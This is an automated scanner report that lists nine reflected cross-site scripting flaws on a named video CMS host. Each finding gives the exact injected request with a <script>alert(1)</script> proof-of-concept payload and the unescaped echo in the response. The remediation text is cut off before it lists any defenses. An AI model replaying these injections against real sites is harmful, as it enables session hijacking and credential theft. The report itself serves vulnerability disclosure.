wreg.vidcms.trb.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Sun Feb 27 16:22:24 CST 2011.


Loading

1. Cross-site scripting (reflected)

1.1. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6 [REST URL parameter 3]

1.2. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6 [REST URL parameter 3]

1.3. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6 [REST URL parameter 4]

1.4. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c [REST URL parameter 3]

1.5. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c [REST URL parameter 3]

1.6. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c [REST URL parameter 4]

1.7. http://wreg.vidcms.trb.com/alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 [REST URL parameter 3]

1.8. http://wreg.vidcms.trb.com/alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 [REST URL parameter 3]

1.9. http://wreg.vidcms.trb.com/alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 [REST URL parameter 4]



1. Cross-site scripting (reflected)
There are 9 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6 [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa03a<script>alert(1)</script>54eb2fdb930 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edgefa03a<script>alert(1)</script>54eb2fdb930/content/299fda98-b8af-49c4-987a-09d58e40d6e6 HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3795
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:18:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>54eb2fdb930/content/299fda98-b8af-49c4-987a-09d58e40d6e6">/alfresco/service/edgefa03a<script>alert(1)</script>54eb2fdb930/content/299fda98-b8af-49c4-987a-09d58e40d6e6</a>
...[SNIP]...

1.2. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1942d"><script>alert(1)</script>e5daa6089ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge1942d"><script>alert(1)</script>e5daa6089ba/content/299fda98-b8af-49c4-987a-09d58e40d6e6 HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3803
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:18:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="/alfresco/service/edge1942d"><script>alert(1)</script>e5daa6089ba/content/299fda98-b8af-49c4-987a-09d58e40d6e6">
...[SNIP]...

1.3. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e6

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254b4"><script>alert(1)</script>ca686b65e99 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge/254b4"><script>alert(1)</script>ca686b65e99/299fda98-b8af-49c4-987a-09d58e40d6e6 HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3775
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:18:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="/alfresco/service/edge/254b4"><script>alert(1)</script>ca686b65e99/299fda98-b8af-49c4-987a-09d58e40d6e6">
...[SNIP]...

1.4. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6de8b"><script>alert(1)</script>32c1021faf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge6de8b"><script>alert(1)</script>32c1021faf1/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26ADE74D851D20C7-60000128603D550C[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3823
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:19:40 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="/alfresco/service/edge6de8b"><script>alert(1)</script>32c1021faf1/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c">
...[SNIP]...

1.5. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea3a7<script>alert(1)</script>7c66ed0122a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edgeea3a7<script>alert(1)</script>7c66ed0122a/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26ADE74D851D20C7-60000128603D550C[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3815
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:19:40 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>7c66ed0122a/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c">/alfresco/service/edgeea3a7<script>alert(1)</script>7c66ed0122a/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c</a>
...[SNIP]...

1.6. http://wreg.vidcms.trb.com/alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/299fda98-b8af-49c4-987a-09d58e40d6e650c4c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc69"><script>alert(1)</script>0f0e14c0c0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge/bbc69"><script>alert(1)</script>0f0e14c0c0a/299fda98-b8af-49c4-987a-09d58e40d6e650c4c HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26ADE74D851D20C7-60000128603D550C[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3795
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:19:40 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="/alfresco/service/edge/bbc69"><script>alert(1)</script>0f0e14c0c0a/299fda98-b8af-49c4-987a-09d58e40d6e650c4c">
...[SNIP]...

1.7. http://wreg.vidcms.trb.com/alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 440a5<script>alert(1)</script>da1c7ca29b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge440a5<script>alert(1)</script>da1c7ca29b8/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3795
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:18:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>da1c7ca29b8/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6">/alfresco/service/edge440a5<script>alert(1)</script>da1c7ca29b8/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6</a>
...[SNIP]...

1.8. http://wreg.vidcms.trb.com/alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93554"><script>alert(1)</script>7c82e6e1847 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge93554"><script>alert(1)</script>7c82e6e1847/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3803
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:18:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="/alfresco/service/edge93554"><script>alert(1)</script>7c82e6e1847/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6">
...[SNIP]...

1.9. http://wreg.vidcms.trb.com/alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6 [REST URL parameter 4]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://wreg.vidcms.trb.com
Path:   /alfresco/service/edge/content/ccc15abd-ce30-4845-858c-bfb87bf39ce6

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ca9"><script>alert(1)</script>2bc5da5c478 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alfresco/service/edge/44ca9"><script>alert(1)</script>2bc5da5c478/ccc15abd-ce30-4845-858c-bfb87bf39ce6 HTTP/1.1
Host: wreg.vidcms.trb.com
Proxy-Connection: keep-alive
Referer: http://wreg.vid.trb.com/player/PaperVideoTest.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 3775
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Wed, 16 Feb 2011 13:18:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="/alfresco/service/edge/44ca9"><script>alert(1)</script>2bc5da5c478/ccc15abd-ce30-4845-858c-bfb87bf39ce6">
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Feb 27 16:22:24 CST 2011.